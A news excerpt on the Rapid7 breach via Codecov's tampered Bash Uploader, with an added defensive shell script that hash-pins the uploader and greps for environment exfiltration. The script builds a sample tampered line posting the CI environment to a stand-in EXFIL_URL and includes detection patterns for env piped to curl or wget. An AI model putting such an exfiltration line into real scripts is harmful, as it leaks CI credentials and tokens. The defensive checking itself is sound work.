Security vendor Rapid7 is the latest victim of a software supply-chain breach
An unknown number of Rapid7 customers, and Rapid7 itself, have become the latest victims of a security incident at a trusted third-party software supply-chain partner.
On Friday, Rapid7 disclosed that attackers had accessed some of its source code repositories via a third-party Bash Uploader from Codecov that the security vendor was using in its development environment.
The attackers had previously compromised the uploader and modified it so code and associated data from Rapid7 and other Codecov customer environments would be uploaded to an attacker-controlled server — in addition to Codecov’s own systems as intended.
Many companies use Codecov to measure how thoroughly their test suites exercise the code they are developing. Codecov's Bash Uploader script sends coverage reports from customer CI environments to Codecov's servers; it runs inside the CI job itself, where environment variables commonly hold the credentials, tokens, or keys the build needs.
In January 2021, an attacker gained the ability to modify the Bash Uploader by taking advantage of an error in Codecov's Docker image creation process. According to Codecov, the configuration error allowed the attacker to extract the credential needed to modify the Bash Uploader script. Codecov did not discover the modification until April 2021.
During that period, the attacker used the modified Bash Uploader to export data from Codecov customers' continuous integration (CI) environments to a remote server. Codecov said the compromised uploader could potentially expose any credentials, tokens, or keys that customers passed through their CI runner, along with any services, data stores, and application code those credentials could reach.
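A pipeline-side check for the failure mode described above, added here as an example and not code from Codecov, Rapid7, or Dark Reading: pin the SHA-256 of a reviewed copy of the uploader and refuse to run a download that does not match, then scan the script for lines that post the CI environment to a remote host. The file names, the pinned hash, both sample scripts, and the UPLOAD_URL and EXFIL_URL variables are constructed for this example; the injected line mirrors the pattern described above (the process environment posted to a second URL) and does not reproduce the actual modification.

```shell
#!/bin/sh
# Added example, not Codecov's or Rapid7's code. Two checks a CI pipeline
# can run on a third-party script before executing it: (1) pin a reviewed
# copy's SHA-256 and refuse to run anything that does not match, (2) scan
# for lines that ship the CI environment to a remote host. File names, the
# "pinned" hash and both sample scripts are constructed for this example.

# Portable SHA-256 of a file (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_uploader FILE EXPECTED_SHA256: 0 if FILE hashes to EXPECTED, else 1.
verify_uploader() {
    [ -r "$1" ] || return 1
    [ "$(sha256_of "$1")" = "$2" ]
}

# scan_uploader FILE: 0 if no line feeds env/printenv output into curl or
# wget, 1 (and the offending line printed) if such a line exists. This is
# the shape of the Codecov tampering: the whole environment posted off-host.
scan_uploader() {
    [ -r "$1" ] || return 1
    if grep -nE '(curl|wget).*\$\((env|printenv)\)' "$1"; then
        return 1
    fi
    if grep -nE '(^|[;&|]) *(env|printenv) *\|.*(curl|wget)' "$1"; then
        return 1
    fi
    return 0
}

# --- constructed samples (not the real uploader) --------------------------
work=$(mktemp -d)
CLEAN="$work/uploader-reviewed.sh"
TAMPERED="$work/uploader-downloaded.sh"

# A reviewed copy: uploads a coverage report and nothing else.
cat > "$CLEAN" <<'EOF'
#!/bin/bash
report="${1:-coverage.xml}"
curl -sS -X POST --data-binary @"$report" "$UPLOAD_URL/upload/v4" || true
EOF

# The same script with one injected line of the kind described above: the
# environment (plus the git remote list) is posted to a second URL.
# EXFIL_URL stands in for the attacker-controlled server; no real address.
{
    head -n 2 "$CLEAN"
    echo 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" "$EXFIL_URL/upload/v2" || true'
    tail -n 1 "$CLEAN"
} > "$TAMPERED"

# Pin the hash of the reviewed copy. In a real pipeline this is the value
# published by the vendor and checked into the repository, not computed here.
PINNED_SHA256=$(sha256_of "$CLEAN")

# run_checks FILE: 0 only if both checks pass; says which one failed.
run_checks() {
    verify_uploader "$1" "$PINNED_SHA256" || { echo "hash mismatch: $1"; return 1; }
    scan_uploader "$1" || { echo "env exfiltration pattern: $1"; return 1; }
    echo "ok: $1"
}

for f in "$CLEAN" "$TAMPERED"; do
    run_checks "$f" || :
done
```

The hash check is the one that matters: replace `curl ... | bash` of an unpinned script with download, verify against the vendor's published hash, then execute, so a modified uploader fails closed before it runs with the job's secrets in its environment. The pattern scan is only a secondary signal; an attacker can encode, split, or indirect the exfiltration so that a regex misses it, so a scan that passes is not evidence that the script is clean.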
Rapid7 said that when it learned of the incident at Codecov, it initiated an internal response process to determine whether and how the company had been affected. The investigation showed that attackers had used the compromised Bash Uploader to access "a small subset" of source code related to tooling for the company's managed detection and response (MDR) service.
“Those repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers,” Rapid7 said Friday.
To read the complete article, visit Dark Reading.